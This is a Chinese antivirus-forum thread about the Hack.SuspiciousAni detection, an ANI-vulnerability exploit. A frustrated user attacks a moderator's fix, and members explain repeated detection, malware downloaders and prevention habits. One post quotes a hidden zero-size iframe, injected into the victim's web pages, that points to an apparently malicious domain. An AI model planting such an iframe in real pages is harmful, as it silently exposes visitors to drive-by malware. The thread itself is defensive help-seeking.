瑞星卡卡安全论坛

========Title========

========Content========
斑竹发关于Hack.SuspiciousAni的简要解释 纯属扯淡

你那解决方法管用吗？补丁打了管用吗？
什么叫做瑞星杀死了，然后又去中了。杀不死就是杀不死，我都杀了多少次了，补丁打了。安全模式下也杀了，临时文件也清理了。我打开个网站就又中毒了，为什么中了？这叫做杀完毒后我又去中吗？？我打开http://www.baidu.com也叫又去中毒吗？打开你们的瑞星主页也叫又去中毒吗？？杀了半天还是不能开浏览器，这叫杀了毒了？？？既然杀死了开没毒的网站还中毒，这话通吗？？？
我开正版瑞星杀了毒，瑞星上连接的主页一样瑞星抱毒，难道说是你网页上的毒又给我中了？？？

别那这句话糊弄人：什么叫做杀了毒后，又去中了毒！！！狗屁不通！！！
极其鄙视这个发贴的斑竹，所有的所有到的很多都是引用你们着卡卡舍区斑竹的话，结果看看吧，有几个人把这毒给真正搞定的，就你那方法，实话，我用了，不行！！！！
还在找具体解决方法中ing 。。。

哎 无语中...

郁闷中.....

伤感中.和什么人说话都简单,只有和自以为是的白痴说话费力

我到这论坛时间并不长。

看了一阵，觉得很多中毒的特肯抱怨杀软不行。

实际上现在的新病毒，或者新病毒制作者吧。

如果出来个东西不能停掉杀软，那还有啥用？？？？

所以中了毒的人，首先不能过度依赖杀毒软件。

如果每个人都能去所有杀软论坛去看一遍，就会发现，和楼主同样言论的多了。

现在还没见哪家的杀毒软件，能通吃所有病毒，包括今天或明天将要出的新病毒。

有时候就是以前的老病毒，如果在用户点击了网页允许网页文件运行后，下载的新东西下来，杀软也只杀了老病毒，新东西一样没法杀。
而新东西驻留系统以后，不断下载大量的木马和老病毒。

这导致所有中了的用户，都有楼主的想法。

这在其他的所有杀软论坛都一样。

所有在这看过不信的都可以去看看。

瑞星的杀毒能力太弱了,这不是版主的错,现在对瑞星是骂声不断,做瑞星的版主是不容易的,个人能力超群,但东家确是不争气,有些抬不起头的,所以大家要体谅,现在判断菜鸟的一个标准是看其用什么杀软(高手除外 不用都行),选择杀软最好咨询对系统真正有所了解的老鸟,不要相信那些过度的宣传

同情中!!!!!!

我也中了Hack.SuspiciousAni，打开任何一个网站和网页，

并且网页第一行都会嵌入一段<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>   

上网查了两天都找不到原因？郁闷啊！高手在哪里？

引用:

【sofore的贴子】我也中了Hack.SuspiciousAni，打开任何一个网站和网页， 并且网页第一行都会嵌入一段<iframe src=http://w3213.com/ width=0 height=0 frameborder=0></iframe>    上网查了两天都找不到原因？郁闷啊！高手在哪里？ ………………

你应该是中了http://forum.ikaka.com/topic.asp?board=28&artid=8302447这个地址说的东西
加我 463216947

1,杀软不是万能的.如果杀软什么都能杀,那谁还做病毒
2,这里的人也不是瑞星的工作人员,你对瑞星的不满应该去联系客服
3,斑竹也是人,也会有失误的时候,不是所有人都不犯错的
4,这个是利用ANI漏洞进来的毒,不打补丁肯定还会再中的
5,平时不注意系统安全,中毒后到处找人帮助,帮助无效的就骂人的人,有资格来求助吗
6,病毒是每天都会变的,同一个病毒也有N个变种,不是所有的方法都适用的.

无语！应该懂得点基本的常识呀。

瑞星现在真的不怎么强了。。。
有同感的GGJJDDMM跟上。。。。。

搞清楚几个概念：
1.“中毒”是否必然“对电脑有实质危害”。
如果你认为，杀软报了Hack.SuspiciousAni，就是你中了这个毒，假设你对“中毒”的概念是这么理解的，那么我可以告诉你，你所谓的“中毒”，并不等于必然“对电脑有实质危害”。原理我已经解释得很清楚了。
打了补丁，或安装杀毒软件来查杀，可以避免Hack.SuspiciousAni本身对电脑造成实质危害，但是并不能避免它的出现，所以也就并不能避免你所谓的“中毒”。
就像盾牌可以挡住射来的箭，让它们不能刺杀你，但是并不能避免人们向你射箭，而且也必然会有箭与盾相撞的铿锵之声。补丁和杀软就是盾牌，报警就是铿锵之声了。你可能会对这种“声音”不满，但是事实就是这样的。

2.下载器和它所下载的木马的区别
威金和落雪，不是一回事。当然，以前威金病毒，很多情况下会顺带下载落雪木马，于是两者就发生了联系。在再者之间的联系中，威金病毒是一个下载器，而落雪木马则是它所下载的东西。
下载器和它所下载的木马，功能完全是可分的，其联系也不是必然的。落雪木马并不一定要由威金病毒下载才能传播，而威金病毒，也不止下载落雪木马这一种行为，甚至它下载的木马中也不一定就包括落雪木马（只需要把威金病毒的下载链接改一改就行了）。因此，两者在本质上完全是独立不同的病毒，只是在某些情况下，建立了联系而已。
正因为这种联系不是必然的，不是本质的，不是固有的，所以也就不成其为“规律”（规律指事物与事物之间，或事物内部各要素之间，所存在的固有的本质的必然的联系）。

具体到本次事件，8楼给出的帖子如果你认真看，你就会明白其中的道理。
对于Hack.SuspiciousAni本身而言，它不一定需要ddd.exe这个病毒来传播。而ddd.exe这个病毒的行为，也不止于导致Hack.SuspiciousAni的存在（那只算是它传播的一种方式，带毒网页中同样存在利用MS06-014漏洞的脚本。另外它同样下载其他大量木马）。

所以，Hack.SuspiciousAni和ddd.exe本质上是两个独立的东西。对于Hack.SuspiciousAni来说，它被反复地下载到本机临时文件夹中，以致杀软反复报毒，这完全符合我关于“反复中毒”的说法（注意，我说的重复“中毒”，只是对Hack.SuspiciousAni本身而言）。而处理Hack.SuspiciousAni本身的方法，的确是清空临时文件夹，这一点我也没有说错（再次注意，我指的只是处理Hack.SuspiciousAni本身，而并不包括在它之外的其他东西。另外我从来没有说过处理了之后就不再会报警，事实上即使不是与ddd.exe有关联的情况，也可能反复报毒，这我在前面已经说得很清楚）。

当Hack.SuspiciousAni与ddd.exe关联起来的时候，大家真正要注意和处理的，就不是Hack.SuspiciousAni本身了，而是ddd.exe。而对ddd.exe这个病毒的处理，则又是另一码事了。如果因为ddd.exe可能是导致Hack.SuspiciousAni的一个原因，我在说Hack.SuspiciousAni的时候就必须把ddd.exe的查杀方法包括进去的话，那么是不是我还要把未来可能出现的所有像ddd.exe的病毒的处理方法全部“未卜先知”地列上去，才会让楼主觉得我不是在扯淡呢？！

路过——————小子，骂人不好啊，你来的这里是社区论坛，不是瑞星客服。这里的版主应该没有收费向你提供服务。也没有向你承诺有关该方法的相关效果。另外从你的言谈看来你对你正在做的事情其实不真正了解。所以，最好还是虚心点听听别人的话吧^_^

12楼的回复楼主也不一定能看懂，这样浪费精力，意义不大

12楼的字比较小,字体看上去不舒服.估计LZ看不下去

该用户帖子内容已被屏蔽

引用:

【水树雨下的贴子】12楼的回复楼主也不一定能看懂，这样浪费精力，意义不大 ………………

我真是只给楼主看的吗？你认为呢？！如果说版主和其他活跃会员们有什么不同，那就是版主除了处理具体帖子的回复之外，更多地需要把握“大方向”，需要对会员们的思路做出指引。所以版主的帖子不一定是很具体的病毒查杀，同样也需要像这样澄清概念和思路的回复。
Hack.SuspiciousAni，与Trojan.VBS.Agent（这是利用MS06-014的恶意脚本）一样，都是利用漏洞的媒介，有其特殊性，与exe文件病毒是完全不同的。但是很多会员却没有办法把它们和一般PE病毒区分开来。
同样的，“重复中毒”与“中毒后杀不掉”的概念，很多会员也没有很好地区分。更不要说木马下载器和被下载的木马之间的区别（经常是查杀了下载的木马，但是下载器还留着，导致再次中毒）。
求助者仅因为系统还原文件夹和临时文件夹中查出病毒，就束手无策的情况，更是令人遗憾的屡见不鲜。

这些，其实都是最基础的安全知识。没有把这些概念弄清楚的会员们，在求助的时候就很难接触到问题的关键，结果是费时又费力。当然，在论坛上活跃了一段时间，有经验的会员们，对这些问题慢慢地也就清楚了。然而，我们仍然需要一些系统的说明，以在这条道路上少走弯路。

相信所有在论坛上活跃的会员们都明白，反病毒论坛的目的，不单单是为大家解决一时一刻的病毒问题。其更重要也更深刻的意义，在于通过这样的互助提高大家的安全意识，树立良好的安全习惯，教会大家自己保护自己。

不再罗嗦了，要不然，恐怕又要说“意义不大”了。我这个帖子，也不是单纯回复你一个人。

小聪随便打几个字,都成了一篇好文章了...哈哈..

羡慕中...

【回复“轩辕小聪”的帖子】
这种问题说多了很容易招骂，毕竟懂的少，大部分人看了还是一头雾水，要抱怨的，还是会抱怨，要骂的，还会继续骂。费劲不讨好的活，我是不想干。以上纯属个人观点，拒绝拍砖。

接受中

引用:

【水树雨下的贴子】【回复“轩辕小聪”的帖子】 这种问题说多了很容易招骂，毕竟懂的少，大部分人看了还是一头雾水，要抱怨的，还是会抱怨，要骂的，还会继续骂。费劲不讨好的活，我是不想干。以上纯属个人观点，拒绝拍砖。 ………………

这个这个那个那个.........水树怕被拍死？（说笑而已，不要见怪）

来卡卡一段时间，某种程度上，发现了一些问题，这些在我以前的各种帖子里面都提及过。
最新的一个问题是，曾经转过其它类似的论坛，发现一般来说都有这样的规定：除非需要，否则不准发各种软件扫描的日志（包括HIJACKIT和SRENG2的）。卡卡就很特别，一般都是直接叫求助者发SRENG2的日志。这的确很省事，但是无形中增加了负荷（服务器方面的）......是定位的不同呢？

要说瑞星不管卡卡，那是不可能的。事实上，csdn出版的一期《程序员》的一篇瑞星某经理写的文章就引用了TOM2000关于熊猫烧香的反思文章。而瑞星本身也在有意无意拿卡卡做宣传点，再加上媒体对熊猫烧香的大范围炒作，导致众多外人以为卡卡版主就是瑞星人员。事实上，直到上一年底，我才知道，卡卡版主并非瑞星人员..........

我一直担心，卡卡将如何发展？

另外一个，有没有发现置顶帖中除了TOM2000之前写的帖子之外，就没有其它的预防的帖子？而且都是关于查杀病毒的.....

一句话，我们没有做好引导，就像TOM2000所想的那样，过分注重手工杀的工具而忽略了引导他们防的概念。

最后说一下我这边的一些情况。自从所认识的圈子里面推广正确打开U盘的方法之后，从U盘中毒的几率减少了，但是中毒概率仍然没有减低，正在寻找下一个突破口.........

引用:

【horseluke11的贴子】 最新的一个问题是，曾经转过其它类似的论坛，发现一般来说都有这样的规定：除非需要，否则不准发各种软件扫描的日志（包括HIJACKIT和SRENG2的）。卡卡就很特别，一般都是直接叫求助者发SRENG2的日志。这的确很省事，但是无形中增加了负荷（服务器方面的）......是定位的不同呢？ ………………

这年头灌水难啊....

只有让别人扫日志这样的灌水方法,是顺理成章的....

还可以顺便学习下看日志....啊哈哈哈..!
(开玩笑的..)




附件: 7052362007424195152.gif

引用:

【horseluke11的贴子】 这个这个那个那个.........水树怕被拍死？（说笑而已，不要见怪） 来卡卡一段时间，某种程度上，发现了一些问题，这些在我以前的各种帖子里面都提及过。 最新的一个问题是，曾经转过其它类似的论坛，发现一般来说都有这样的规定：除非需要，否则不准发各种软件扫描的日志（包括HIJACKIT和SRENG2的）。卡卡就很特别，一般都是直接叫求助者发SRENG2的日志。这的确很省事，但是无形中增加了负荷（服务器方面的）......是定位的不同呢？ 要说瑞星不管卡卡，那是不可能的。事实上，csdn出版的一期《程序员》的一篇瑞星某经理写的文章就引用了TOM2000关于熊猫烧香的反思文章。而瑞星本身也在有意无意拿卡卡做宣传点，再加上媒体对熊猫烧香的大范围炒作，导致众多外人以为卡卡版主就是瑞星人员。事实上，直到上一年底，我才知道，卡卡版主并非瑞星人员.......... 我一直担心，卡卡将如何发展？ 另外一个，有没有发现置顶帖中除了TOM2000之前写的帖子之外，就没有其它的预防的帖子？而且都是关于查杀病毒的..... 一句话，我们没有做好引导，就像TOM2000所想的那样，过分注重手工杀的工具而忽略了引导他们防的概念。 最后说一下我这边的一些情况。自从所认识的圈子里面推广正确打开U盘的方法之后，从U盘中毒的几率减少了，但是中毒概率仍然没有减低，正在寻找下一个突破口......... ………………

你的问题过去见人讨论过，虽然我来的时间不长，干脆也JW几句。
卡卡这里完全开放注册，大部分网友都是中毒来求助，问题解决了，拍拍屁股走人。又有问题了，重新申请个ID，继续发贴求助。卡卡里10个贴子以下，一年半载没登陆的ID多了。
防毒的文章不是没有，肯找的话一搜一把，但是基本上就那几条，无非是打全补丁，提高意识。然后就是不用盗版，破解。但是听的有几个？能做到的又有几个？大部分人都抱侥幸心理，你跟他说不用盗版，破解，他一句话就能把你噎回去“我没钱，买不起正版，中毒了大不了重装”。你那里其实也一样，全国哪都一样，社会现象。
全民提高意识，那是扯淡。没人跟你同一战线。“我不能为了一棵树而放弃整座森林”至理名言。过去是，现在是，将来也是。

呵呵！！！！！！！！！！

我再插插！！！

预防-----这在玩电脑的所有人里应该没多少会认真去防的，就说SSM这个工具，你就说再多，又没几个懂进程知识，怎么看那提示？？？

至于盗版---------中国就这社会现象，没法改变，一个字---------穷。

卡卡这边----------注意观察了一个多月，也就我们这几个还坚持在这帮人看一看。其他的好多5000文章以上量的，感觉都没啥兴趣了。版主常来这的，也就猫猫和小聪。猫猫来时还帮不少人，其他的就不知怎的了？估计都不是太有兴趣这个了。我注意过好象都去忙自己的博客去了。

这一阵如果不是火影、阳光、水树、残月和其他几位（不多说了）一直不停的帮求助的，我估计求助的都会失望透的。

不知当他们有事不来了以后还会不会再有人接替了。

都是牛人....

一个比一个牛...

文件章越来越好了...

像种贴子都可以顶火.....

继续顶啊...哈哈...

【回复“水树雨下”的帖子】
"卡卡这里完全开放注册"完全不能成为理由，杭州志愿者论坛也是开放注册的，但是它也有类似的规定（当然，它有规定的板块。但卡卡的确有它的特殊性，斑竹做不了主）。
“不用盗版，破解”这个在中国的确很难做到，但是有时候似乎又不是这个原因。例如女孩那边没人会找什么破解软件，但是找电影电视剧的倒是很多。我在猜想是不是这个原因导致女生那边出现这样的问题......

全民提高意识，哪怕一点点，也会有很大作用的.......可能比较理想化了，呵呵。

【回复“天月来了”的帖子】
预防不一定就必需要使用SSM这个工具。多少老师（甚至是教授级）打开U盘就是直接双击打开的？这点并不需要什么技术含量吧？缺乏的是引导......


其他的人可能有自己的事情。就比如我现在浏览卡卡必须得用外国服务器来看（只能查看不能登陆），如果要发帖又要切换为无代理状态，结果.....速度之慢可想而知......

我相信会有后来者的，因为我相信“长江后浪推前浪”......

P.S:刷新10分钟之后，我才发出这张贴.......对校园网感觉要崩溃了........

人气越来越差了